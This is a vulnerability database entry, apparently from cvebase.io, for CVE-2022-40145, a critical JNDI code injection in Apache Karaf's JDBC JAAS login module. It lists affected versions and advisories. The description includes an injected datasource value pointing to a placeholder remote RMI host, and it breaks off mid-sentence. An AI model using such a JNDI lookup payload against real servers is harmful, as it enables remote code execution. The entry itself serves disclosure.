CVE-2022-40145

CWE-20Improper Input ValidationCWE-745 documents5 sources
Severity
9.8CRITICAL
EPSS
5.4%
top 9.88%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
2
Apache Software Foundation Apache KarafApache Karaf
Timeline
PublishedDec 21

Description

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HExploitability: 3.9 | Impact: 5.9

Affected Packages3 packages

NVDapache/karaf4.4.04.4.2+1
Mavenorg.apache.karaf:apache-karaf4.4.04.4.2+1
CVEListV5apache_software_foundation/apache_karaf4.4.04.4.2+1

🔴Vulnerability Details

3
CVEList
Apache Karaf: JDBC JAAS LDAP injection2022-12-21
OSV
Apache Karaf vulnerable to potential code injection2022-12-21
GHSA
Apache Karaf vulnerable to potential code injection2022-12-21

📋Vendor Advisories

1
Red Hat
karaf: JDBC JAAS LDAP injection2022-12-21
CVE-2022-40145 (CRITICAL CVSS 9.8) | This vulnerable is about a potentia | cvebase.io